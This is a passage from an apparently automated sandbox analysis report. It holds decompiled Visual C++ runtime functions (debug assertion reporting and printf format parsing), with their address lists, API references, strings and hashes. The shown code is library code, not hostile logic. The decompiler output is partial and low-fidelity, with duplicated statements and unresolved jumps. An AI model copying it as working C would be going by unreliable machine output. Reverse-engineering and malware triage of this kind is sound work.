							 *(_t263 - 0x2024) =  *(_t263 - 0x5058);
							goto L43;
						}
						goto L43;
					} else {
						L44:
						if( *(_t263 - 0x302c) == 0) {
							if( *0x4e41e0 != 0) {
								 *(_t263 - 0x505c) = 0;
								_t240 = _t263 - 0x505c;
								_t164 =  *0x4e41e0( *(_t263 + 8), _t263 - 0x3028, _t263 - 0x505c);
								_t271 = _t271 + 0xc;
								if(_t164 != 0) {
									 *(_t263 - 0x302c) = 1;
									_t240 =  *(_t263 - 0x505c);
									 *(_t263 - 0x2024) =  *(_t263 - 0x505c);
								}
							}
							if( *(_t263 - 0x302c) == 0) {
								if(( *(0x4bb7b0 +  *(_t263 + 8) * 4) & 0x00000001) != 0 &&  *(0x4bb7bc +  *(_t263 + 8) * 4) != 0xffffffff) {
									_t160 = E00410910(_t263 - 0x3028);
									_t271 = _t271 + 4;
									WriteFile( *(0x4bb7bc +  *(_t263 + 8) * 4), _t263 - 0x3028, _t160, _t263 - 0x5060, 0);
								}
								if(( *(0x4bb7b0 +  *(_t263 + 8) * 4) & 0x00000002) != 0) {
									OutputDebugStringA(_t263 - 0x3028);
								}
								_t240 =  *(_t263 + 8);
								if(( *(0x4bb7b0 +  *(_t263 + 8) * 4) & 0x00000004) != 0) {
									 *(_t263 - 0x4030) = 0;
									if( *(_t263 + 0x10) != 0) {
										E0040CC90(E0041D5B0(_t263 - 0x4030,  *(_t263 + 0x10), _t263 - 0x4030, 0x1000, 0xa), _t157, L"_itoa_s(nLine, szLineMessage, 4096, 10)", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x1a2, 0);
										_t271 = _t271 + 0x28;
									}
									asm("sbb edx, edx");
									_t240 =  *(_t263 + 8);
									 *(_t263 - 0x2024) = L00418D00(_t208,  *(_t263 + 8), _t259, _t261,  *(_t263 + 8),  *(_t263 + 0xc),  ~( *(_t263 + 0x10)) & _t263 - 0x00004030,  *((intOrPtr*)(_t263 + 0x14)), _t263 - 0x5030);
								}
							}
						}
						L58:
						 *(_t263 - 4) = 0xfffffffe;
						E00412CCF();
						_t147 =  *(_t263 - 0x2024);
						 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0x10));
						_pop(_t260);
						_pop(_t262);
						_pop(_t209);
						return E00410900(_t147, _t209,  *(_t263 - 0x1c) ^ _t263, _t240, _t260, _t262);
					}
				}
				E0040CC90(E0041D5B0(_t210,  *(_t263 + 0x10), _t263 - 0x4030, 0x1000, 0xa), _t204, L"_itoa_s(nLine, szLineMessage, 4096, 10)", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x119, 0);
				OutputDebugStringA("Second Chance Assertion Failed: File ");
				if( *(_t263 + 0xc) == 0) {
					 *(_t263 - 0x5064) = "<file unknown>";
				} else {
					 *(_t263 - 0x5064) =  *(_t263 + 0xc);
				}
				_t240 =  *(_t263 - 0x5064);
				OutputDebugStringA( *(_t263 - 0x5064));
				OutputDebugStringA(", Line ");
				OutputDebugStringA(_t263 - 0x4030);
				OutputDebugStringA("\n");
				E004124D0(_t263 - 0x4030);
				 *(_t263 - 0x2024) = 0xffffffff;
				goto L58;
			}

0x004125ce
0x004125db
0x00412688
0x0041268e
0x0041269f
0x004126aa
0x004126c2
0x004126c9
0x004126ce
0x004126d1
0x004126de
0x00412702
0x00412707
0x00412707
0x0041270a
0x0041270f
0x00412715
0x0041271e
0x00412750
0x00412755
0x00412755
0x0041271e
0x0041275c
0x00412762
0x00412770
0x00412764
0x00412764
0x00412764
0x0041279c
0x004127ac
0x004127b1
0x004127b1
0x004127e6
0x004127eb
0x004127f2
0x004127f4
0x00412801
0x00412833
0x00412838
0x00412838
0x0041285b
0x0041286b
0x00412870
0x00412870
0x00412877
0x00412987
0x0041298c
0x0041287d
0x0041287d
0x0041288e
0x00412899
0x004128a5
0x004128a6
0x004128a9
0x004128c4
0x004128c9
0x004128cc
0x004128d9
0x004128fd
0x00412902
0x00412902
0x00412910
0x00412919
0x0041294b
0x00412950
0x00412950
0x00412953
0x0041298f
0x00412999
0x004129b8
0x004129c7
0x004129ee
0x004129f3
0x004129fd
0x00412a2f
0x00412a34
0x00412a34
0x00412a3e
0x00412a4d
0x00412a57
0x00412a63
0x00412a68
0x00412a6b
0x00412a72
0x00412a78
0x00412a8f
0x00412a98
0x00412ab4
0x00412abd
0x00412abf
0x00412ac4
0x00412a89
0x00000000
0x00412a89
0x00412ac6
0x00412ad6
0x00000000
0x00412ad6
0x00412ae7
0x00412b57
0x00412b57
0x00412b5e
0x00000000
0x00412b5e
0x00412ae9
0x00412aef
0x00412b06
0x00412b0f
0x00412b2b
0x00412b34
0x00412b36
0x00412b3b
0x00412b00
0x00000000
0x00412b00
0x00412b3d
0x00412b4d
0x00000000
0x00412b4d
0x00000000
0x00412b70
0x00412b70
0x00412b77
0x00412b84
0x00412b86
0x00412b90
0x00412ba2
0x00412ba8
0x00412bad
0x00412baf
0x00412bb9
0x00412bbf
0x00412bbf
0x00412bad
0x00412bcc
0x00412bdf
0x00412bfe
0x00412c03
0x00412c19
0x00412c19
0x00412c2c
0x00412c35
0x00412c35
0x00412c3b
0x00412c48
0x00412c4a
0x00412c55
0x00412c88
0x00412c8d
0x00412c8d
0x00412ca0
0x00412caf
0x00412cbb
0x00412cbb
0x00412c48
0x00412bcc
0x00412cc1
0x00412cc1
0x00412cc8
0x00412ce1
0x00412cea
0x00412cf2
0x00412cf3
0x00412cf4
0x00412d02
0x00412d02
0x00412a3e
0x00412612
0x0041261f
0x00412629
0x00412636
0x0041262b
0x0041262e
0x0041262e
0x00412640
0x00412647
0x00412652
0x0041265f
0x0041266a
0x00412670
0x00412675
0x00000000

APIs

InterlockedIncrement.KERNEL32(004BB7AC), ref: 004125D3
__invoke_watson_if_error.LIBCMTD ref: 00412612
OutputDebugStringA.KERNEL32(Second Chance Assertion Failed: File ), ref: 0041261F
OutputDebugStringA.KERNEL32(004042F0), ref: 00412647
OutputDebugStringA.KERNEL32(, Line ), ref: 00412652
OutputDebugStringA.KERNEL32(?), ref: 0041265F
OutputDebugStringA.KERNEL32(00402174), ref: 0041266A
_wcscat_s.LIBCMTD ref: 0041282A

Part of subcall function 0041C9C0: __invalid_parameter.LIBCMTD ref: 0041CA32

__invoke_watson_if_error.LIBCMTD ref: 00412833

Part of subcall function 0040CC90: __invoke_watson.LIBCMTD ref: 0040CCB1

_wcscat_s.LIBCMTD ref: 00412862

Part of subcall function 0041C9C0: _memset.LIBCMT ref: 0041CA9B
Part of subcall function 0041C9C0: __invalid_parameter.LIBCMTD ref: 0041CAF7

__invoke_watson_if_error.LIBCMTD ref: 0041286B
__snwprintf_s.LIBCMTD ref: 004128C4

Part of subcall function 0041BA90: __vsnprintf_s_l.LIBCMTD ref: 0041BAB2

__invoke_watson_if_oneof.LIBCMTD ref: 004128FD
_wcscpy_s.LIBCMTD ref: 00412942
__invoke_watson_if_error.LIBCMTD ref: 0041294B
__cftoe.LIBCMTD ref: 004129BF
__invoke_watson_if_oneof.LIBCMTD ref: 004129EE
_wcscpy_s.LIBCMTD ref: 00412A26
__invoke_watson_if_error.LIBCMTD ref: 00412A2F
__itow_s.LIBCMTD ref: 00412609

Part of subcall function 0041D5B0: _xtow_s@20.LIBCMTD ref: 0041D5DB

__strftime_l.LIBCMTD ref: 004126C9
__invoke_watson_if_oneof.LIBCMTD ref: 00412702
_wcscpy_s.LIBCMTD ref: 00412747
__invoke_watson_if_error.LIBCMTD ref: 00412750
_wcscpy_s.LIBCMTD ref: 004127A3
__invoke_watson_if_error.LIBCMTD ref: 004127AC
_wcscat_s.LIBCMTD ref: 004127DD
__invoke_watson_if_error.LIBCMTD ref: 004127E6

Strings

, Line , xrefs: 0041264D
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String"), xrefs: 00412A10
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error"), xrefs: 0041292C
e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1)), xrefs: 004129DE
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error"), xrefs: 00412731
_CrtDbgReport: String too long or Invalid characters in String, xrefs: 00412A15
Assertion failed!, xrefs: 00412770
_itoa_s(nLine, szLineMessage, 4096, 10), xrefs: 004125F2, 00412C68
_VCrtDbgReportA, xrefs: 004125ED, 004126EC, 0041272C, 00412786, 004127C0, 0041280F, 00412847, 004128E7, 00412927, 004129D9, 00412A0B, 00412C63
strcat_s(szLineMessage, 4096, "\r"), xrefs: 00412814
strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!"), xrefs: 0041278B
(*_errno()), xrefs: 004126F1, 004128EC
_CrtDbgReport: String too long or IO Error, xrefs: 00412736, 00412931
Second Chance Assertion Failed: File , xrefs: 0041261A
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c, xrefs: 004125E8, 004126E7, 00412727, 00412781, 004127BB, 0041280A, 00412842, 004128E2, 00412922, 004129D4, 00412A06, 00412C5E
%s(%d) : %s, xrefs: 004128AE
Assertion failed: , xrefs: 00412764
t8j, xrefs: 004129FD
<file unknown>, xrefs: 00412636
strcat_s(szLineMessage, 4096, szUserMessage), xrefs: 004127C5
t9j, xrefs: 00412C55
RH`, xrefs: 00412CB2
strcat_s(szLineMessage, 4096, "\n"), xrefs: 0041284C

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __invoke_watson_if_error$DebugOutputString$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__invalid_parameter$IncrementInterlocked__cftoe__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnprintf_s_l_memset_xtow_s@20
String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $RH`$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$t8j$t9j$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
API String ID: 3801329020-765939317
Opcode ID: bf7c0b3fec9377a32f90ba98675c0ba49768fc2f4ccca62d058a2638d076c255
Instruction ID: 4b020e5a35aefd2b1f252a5c3b1827140e960d929648713c67d06bd2f7c5f253
Opcode Fuzzy Hash: bf7c0b3fec9377a32f90ba98675c0ba49768fc2f4ccca62d058a2638d076c255
Instruction Fuzzy Hash: FF02B5B1A40304ABDB24DF10DD4AFDE7778AB54706F1041AAF608BA2C1D7B85AD4CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004224C9 Relevance: 35.4, APIs: 15, Strings: 5, Instructions: 368
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004224C9(signed int __edx) {
				signed int _t496;
				signed int _t518;
				void* _t523;
				signed int _t525;
				void* _t545;
				signed int _t563;
				signed int _t580;
				signed short _t581;
				signed int _t584;
				signed int _t587;
				signed int _t588;
				void* _t589;
				signed int _t611;
				signed int _t647;
				signed int _t649;
				signed int _t651;
				signed int _t658;
				signed int _t698;
				void* _t699;
				void* _t700;
				signed int _t701;
				void* _t703;
				void* _t704;
				signed int _t712;

				L0:
				while(1) {
					L0:
					_t647 = __edx;
					 *(_t701 - 0x10) =  *(_t701 - 0x10) | 0x00000040;
					 *(_t701 - 8) = 0xa;
					L153:
					while(1) {
						L153:
						while(1) {
							L153:
							while(1) {
								L153:
								if(( *(_t701 - 0x10) & 0x00008000) == 0) {
									_t649 =  *(_t701 - 0x10) & 0x00001000;
									if(_t649 == 0) {
										if(( *(_t701 - 0x10) & 0x00000020) == 0) {
											_t651 =  *(_t701 - 0x10) & 0x00000040;
											if(_t651 == 0) {
												_t496 = E0041F270(_t701 + 0x14);
												_t704 = _t703 + 4;
												 *(_t701 - 0x2b8) = _t496;
												 *(_t701 - 0x2b4) = 0;
											} else {
												_t580 = E0041F270(_t701 + 0x14);
												_t704 = _t703 + 4;
												asm("cdq");
												 *(_t701 - 0x2b8) = _t580;
												 *(_t701 - 0x2b4) = _t651;
											}
										} else {
											_t698 =  *(_t701 - 0x10) & 0x00000040;
											if(_t698 == 0) {
												_t581 = E0041F270(_t701 + 0x14);
												_t704 = _t703 + 4;
												asm("cdq");
												 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
												 *(_t701 - 0x2b4) = _t698;
											} else {
												_t584 = E0041F270(_t701 + 0x14);
												_t704 = _t703 + 4;
												asm("cdq");
												 *(_t701 - 0x2b8) = _t584;
												 *(_t701 - 0x2b4) = _t698;
											}
										}
									} else {
										_t587 = E0041F290(_t701 + 0x14);
										_t704 = _t703 + 4;
										 *(_t701 - 0x2b8) = _t587;
										 *(_t701 - 0x2b4) = _t649;
									}
								} else {
									_t588 = E0041F290(_t701 + 0x14);
									_t704 = _t703 + 4;
									 *(_t701 - 0x2b8) = _t588;
									 *(_t701 - 0x2b4) = _t647;
								}
								if(( *(_t701 - 0x10) & 0x00000040) == 0) {
									L170:
									 *(_t701 - 0x2c0) =  *(_t701 - 0x2b8);
									 *(_t701 - 0x2bc) =  *(_t701 - 0x2b4);
									goto L171;
								} else {
									L166:
									_t712 =  *(_t701 - 0x2b4);
									if(_t712 > 0 || _t712 >= 0 &&  *(_t701 - 0x2b8) >= 0) {
										goto L170;
									} else {
										L169:
										asm("adc edx, 0x0");
										 *(_t701 - 0x2c0) =  ~( *(_t701 - 0x2b8));
										 *(_t701 - 0x2bc) =  ~( *(_t701 - 0x2b4));
										 *(_t701 - 0x10) =  *(_t701 - 0x10) | 0x00000100;
										L171:
										if(( *(_t701 - 0x10) & 0x00008000) == 0 && ( *(_t701 - 0x10) & 0x00001000) == 0) {
											 *(_t701 - 0x2bc) =  *(_t701 - 0x2bc) & 0x00000000;
										}
										if( *(_t701 - 0x30) >= 0) {
											 *(_t701 - 0x10) =  *(_t701 - 0x10) & 0xfffffff7;
											if( *(_t701 - 0x30) > 0x200) {
												 *(_t701 - 0x30) = 0x200;
											}
										} else {
											 *(_t701 - 0x30) = 1;
										}
										if(( *(_t701 - 0x2c0) |  *(_t701 - 0x2bc)) == 0) {
											 *(_t701 - 0x1c) = 0;
										}
										 *((intOrPtr*)(_t701 - 4)) = _t701 - 0x49;
										while(1) {
											L181:
											_t657 =  *(_t701 - 0x30) - 1;
											 *(_t701 - 0x30) =  *(_t701 - 0x30) - 1;
											if( *(_t701 - 0x30) <= 0 && ( *(_t701 - 0x2c0) |  *(_t701 - 0x2bc)) == 0) {
												break;
											}
											L183:
											asm("cdq");
											_t658 =  *(_t701 - 0x2c0);
											 *((intOrPtr*)(_t701 - 0x2ac)) = E00421720(_t658,  *(_t701 - 0x2bc),  *(_t701 - 8), _t657) + 0x30;
											asm("cdq");
											 *(_t701 - 0x2c0) = E004216B0( *(_t701 - 0x2c0),  *(_t701 - 0x2bc),  *(_t701 - 8), _t658);
											 *(_t701 - 0x2bc) = _t658;
											if( *((intOrPtr*)(_t701 - 0x2ac)) > 0x39) {
												 *((intOrPtr*)(_t701 - 0x2ac)) =  *((intOrPtr*)(_t701 - 0x2ac)) +  *((intOrPtr*)(_t701 - 0x260));
											}
											 *((char*)( *((intOrPtr*)(_t701 - 4)))) =  *((intOrPtr*)(_t701 - 0x2ac));
											 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) - 1;
										}
										L186:
										 *((intOrPtr*)(_t701 - 0x24)) = _t701 - 0x49 -  *((intOrPtr*)(_t701 - 4));
										 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) + 1;
										if(( *(_t701 - 0x10) & 0x00000200) != 0 && ( *((intOrPtr*)(_t701 - 0x24)) == 0 ||  *((char*)( *((intOrPtr*)(_t701 - 4)))) != 0x30)) {
											 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) - 1;
											 *((char*)( *((intOrPtr*)(_t701 - 4)))) = 0x30;
											 *((intOrPtr*)(_t701 - 0x24)) =  *((intOrPtr*)(_t701 - 0x24)) + 1;
										}
										L190:
										while(1) {
											L190:
											while(1) {
												L190:
												while(1) {
													L190:
													while(1) {
														L190:
														while(1) {
															L190:
															while(1) {
																L190:
																while(1) {
																	do {
																		L190:
																		if( *((intOrPtr*)(_t701 - 0x28)) != 0) {
																			L216:
																			if( *(_t701 - 0x20) != 0) {
																				L0040F230( *(_t701 - 0x20), 2);
																				_t704 = _t704 + 8;
																				 *(_t701 - 0x20) = 0;
																			}
																			while(1) {
																				L218:
																				 *(_t701 - 0x251) =  *( *(_t701 + 0xc));
																				_t665 =  *(_t701 - 0x251);
																				 *(_t701 + 0xc) =  *(_t701 + 0xc) + 1;
																				if( *(_t701 - 0x251) == 0 ||  *(_t701 - 0x24c) < 0) {
																					break;
																				} else {
																					if( *(_t701 - 0x251) < 0x20 ||  *(_t701 - 0x251) > 0x78) {
																						 *(_t701 - 0x310) = 0;
																					} else {
																						 *(_t701 - 0x310) =  *( *(_t701 - 0x251) + L"h != _T(\'\\0\'))") & 0xf;
																					}
																				}
																				L7:
																				 *(_t701 - 0x250) =  *(_t701 - 0x310);
																				_t525 =  *(_t701 - 0x250) * 9;
																				_t611 =  *(_t701 - 0x25c);
																				_t665 = ( *(_t525 + _t611 + 0x4081a0) & 0x000000ff) >> 4;
																				 *(_t701 - 0x25c) = ( *(_t525 + _t611 + 0x4081a0) & 0x000000ff) >> 4;
																				if( *(_t701 - 0x25c) != 8) {
																					L16:
																					 *(_t701 - 0x318) =  *(_t701 - 0x25c);
																					if( *(_t701 - 0x318) > 7) {
																						continue;
																					}
																					L17:
																					switch( *((intOrPtr*)( *(_t701 - 0x318) * 4 +  &M00422AB0))) {
																						case 0:
																							L18:
																							 *(_t701 - 0xc) = 0;
																							_t528 = E00420DA0( *(_t701 - 0x251) & 0x000000ff, E004103A0(_t701 - 0x40));
																							_t707 = _t704 + 8;
																							if(_t528 == 0) {
																								L24:
																								E00422BC0( *(_t701 - 0x251) & 0x000000ff,  *(_t701 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
																								_t704 = _t707 + 0xc;
																								goto L218;
																							} else {
																								E00422BC0( *((intOrPtr*)(_t701 + 8)),  *(_t701 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
																								_t707 = _t707 + 0xc;
																								_t616 =  *( *(_t701 + 0xc));
																								 *(_t701 - 0x251) =  *( *(_t701 + 0xc));
																								_t665 =  *(_t701 + 0xc) + 1;
																								 *(_t701 + 0xc) = _t665;
																								asm("sbb eax, eax");
																								 *(_t701 - 0x27c) =  ~( ~( *(_t701 - 0x251)));
																								if(_t665 == 0) {
																									_push(L"(ch != _T(\'\\0\'))");
																									_push(0);
																									_push(0x486);
																									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																									_push(2);
																									_t540 = L0040C820();
																									_t707 = _t707 + 0x14;
																									if(_t540 == 1) {
																										asm("int3");
																									}
																								}
																								L22:
																								if( *(_t701 - 0x27c) != 0) {
																									goto L24;
																								} else {
																									 *((intOrPtr*)(L00411810(_t616))) = 0x16;
																									E0040C660(_t589, _t616, _t699, _t700, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
																									 *(_t701 - 0x2f4) = 0xffffffff;
																									E00410370(_t701 - 0x40);
																									_t518 =  *(_t701 - 0x2f4);
																									goto L229;
																								}
																							}
																						case 1:
																							L25:
																							 *(__ebp - 0x2c) = 0;
																							__edx =  *(__ebp - 0x2c);
																							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
																							__eax =  *(__ebp - 0x28);
																							 *(__ebp - 0x18) =  *(__ebp - 0x28);
																							__ecx =  *(__ebp - 0x18);
																							 *(__ebp - 0x1c) = __ecx;
																							 *(__ebp - 0x10) = 0;
																							 *(__ebp - 0x30) = 0xffffffff;
																							 *(__ebp - 0xc) = 0;
																							goto L218;
																						case 2:
																							L26:
																							__edx =  *((char*)(__ebp - 0x251));
																							 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
																							 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
																							 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
																							if( *(__ebp - 0x31c) > 0x10) {
																								goto L33;
																							}
																							L27:
																							__ecx =  *(__ebp - 0x31c);
																							_t74 = __ecx + 0x422ae8; // 0x498d04
																							__edx =  *_t74 & 0x000000ff;
																							switch( *((intOrPtr*)(( *_t74 & 0x000000ff) * 4 +  &M00422AD0))) {
																								case 0:
																									goto L30;
																								case 1:
																									goto L31;
																								case 2:
																									goto L29;
																								case 3:
																									goto L28;
																								case 4:
																									goto L32;
																								case 5:
																									goto L33;
																							}
																						case 3:
																							L34:
																							__edx =  *((char*)(__ebp - 0x251));
																							if( *((char*)(__ebp - 0x251)) != 0x2a) {
																								__eax =  *(__ebp - 0x18);
																								__eax =  *(__ebp - 0x18) * 0xa;
																								__ecx =  *((char*)(__ebp - 0x251));
																								_t98 = __ecx - 0x30; // -48
																								__edx = __eax + _t98;
																								 *(__ebp - 0x18) = __eax + _t98;
																							} else {
																								__eax = __ebp + 0x14;
																								 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
																								if( *(__ebp - 0x18) < 0) {
																									__ecx =  *(__ebp - 0x10);
																									__ecx =  *(__ebp - 0x10) | 0x00000004;
																									 *(__ebp - 0x10) = __ecx;
																									 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
																									 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
																								}
																							}
																							goto L218;
																						case 4:
																							L40:
																							 *(__ebp - 0x30) = 0;
																							goto L218;
																						case 5:
																							L41:
																							__eax =  *((char*)(__ebp - 0x251));
																							if( *((char*)(__ebp - 0x251)) != 0x2a) {
																								 *(__ebp - 0x30) =  *(__ebp - 0x30) * 0xa;
																								_t109 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
																								__ecx =  *(__ebp - 0x30) * 0xa + _t109;
																								 *(__ebp - 0x30) = __ecx;
																							} else {
																								__ecx = __ebp + 0x14;
																								 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
																								if( *(__ebp - 0x30) < 0) {
																									 *(__ebp - 0x30) = 0xffffffff;
																								}
																							}
																							goto L218;
																						case 6:
																							L47:
																							__edx =  *((char*)(__ebp - 0x251));
																							 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
																							 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
																							 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
																							if( *(__ebp - 0x320) > 0x2e) {
																								L70:
																								goto L218;
																							}
																							L48:
																							__ecx =  *(__ebp - 0x320);
																							_t117 = __ecx + 0x422b10; // 0x231e9003
																							__edx =  *_t117 & 0x000000ff;
																							switch( *((intOrPtr*)(( *_t117 & 0x000000ff) * 4 +  &M00422AFC))) {
																								case 0:
																									L53:
																									__edx =  *(__ebp + 0xc);
																									__eax =  *( *(__ebp + 0xc));
																									if( *( *(__ebp + 0xc)) != 0x36) {
																										L56:
																										__edx =  *(__ebp + 0xc);
																										__eax =  *( *(__ebp + 0xc));
																										if( *( *(__ebp + 0xc)) != 0x33) {
																											L59:
																											__edx =  *(__ebp + 0xc);
																											__eax =  *( *(__ebp + 0xc));
																											if( *( *(__ebp + 0xc)) == 0x64) {
																												L65:
																												L67:
																												goto L70;
																											}
																											L60:
																											__ecx =  *(__ebp + 0xc);
																											__edx =  *__ecx;
																											if( *__ecx == 0x69) {
																												goto L65;
																											}
																											L61:
																											__eax =  *(__ebp + 0xc);
																											__ecx =  *( *(__ebp + 0xc));
																											if(__ecx == 0x6f) {
																												goto L65;
																											}
																											L62:
																											__edx =  *(__ebp + 0xc);
																											__eax =  *( *(__ebp + 0xc));
																											if( *( *(__ebp + 0xc)) == 0x75) {
																												goto L65;
																											}
																											L63:
																											__ecx =  *(__ebp + 0xc);
																											__edx =  *__ecx;
																											if( *__ecx == 0x78) {
																												goto L65;
																											}
																											L64:
																											__eax =  *(__ebp + 0xc);
																											__ecx =  *( *(__ebp + 0xc));
																											if(__ecx != 0x58) {
																												L66:
																												 *(__ebp - 0x25c) = 0;
																												goto L18;
																											}
																											goto L65;
																										}
																										L57:
																										__ecx =  *(__ebp + 0xc);
																										__edx =  *((char*)(__ecx + 1));
																										if( *((char*)(__ecx + 1)) != 0x32) {
																											goto L59;
																										}
																										L58:
																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																										__ecx =  *(__ebp - 0x10);
																										__ecx =  *(__ebp - 0x10) & 0xffff7fff;
																										 *(__ebp - 0x10) = __ecx;
																										goto L67;
																									}
																									L54:
																									__ecx =  *(__ebp + 0xc);
																									__edx =  *((char*)(__ecx + 1));
																									if( *((char*)(__ecx + 1)) != 0x34) {
																										goto L56;
																									}
																									L55:
																									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																									__ecx =  *(__ebp - 0x10);
																									__ecx =  *(__ebp - 0x10) | 0x00008000;
																									 *(__ebp - 0x10) = __ecx;
																									goto L67;
																								case 1:
																									L68:
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																									goto L70;
																								case 2:
																									L49:
																									__eax =  *(__ebp + 0xc);
																									__ecx =  *( *(__ebp + 0xc));
																									if(__ecx != 0x6c) {
																										__ecx =  *(__ebp - 0x10);
																										__ecx =  *(__ebp - 0x10) | 0x00000010;
																										 *(__ebp - 0x10) = __ecx;
																									} else {
																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																									}
																									goto L70;
																								case 3:
																									L69:
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
																									goto L70;
																								case 4:
																									goto L70;
																							}
																						case 7:
																							goto L71;
																						case 8:
																							L30:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
																							goto L33;
																						case 9:
																							L31:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
																							goto L33;
																						case 0xa:
																							L29:
																							__ecx =  *(__ebp - 0x10);
																							__ecx =  *(__ebp - 0x10) | 0x00000001;
																							 *(__ebp - 0x10) = __ecx;
																							goto L33;
																						case 0xb:
																							L28:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																							goto L33;
																						case 0xc:
																							L32:
																							__ecx =  *(__ebp - 0x10);
																							__ecx =  *(__ebp - 0x10) | 0x00000008;
																							 *(__ebp - 0x10) = __ecx;
																							goto L33;
																						case 0xd:
																							L33:
																							goto L218;
																					}
																				} else {
																					if(0 == 0) {
																						 *(_t701 - 0x314) = 0;
																					} else {
																						 *(_t701 - 0x314) = 1;
																					}
																					_t618 =  *(_t701 - 0x314);
																					 *(_t701 - 0x278) =  *(_t701 - 0x314);
																					if( *(_t701 - 0x278) == 0) {
																						_push(L"(\"Incorrect format specifier\", 0)");
																						_push(0);
																						_push(0x460);
																						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																						_push(2);
																						_t545 = L0040C820();
																						_t704 = _t704 + 0x14;
																						if(_t545 == 1) {
																							asm("int3");
																						}
																					}
																					L14:
																					if( *(_t701 - 0x278) != 0) {
																						goto L16;
																					} else {
																						 *((intOrPtr*)(L00411810(_t618))) = 0x16;
																						E0040C660(_t589, _t618, _t699, _t700, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
																						 *(_t701 - 0x2f0) = 0xffffffff;
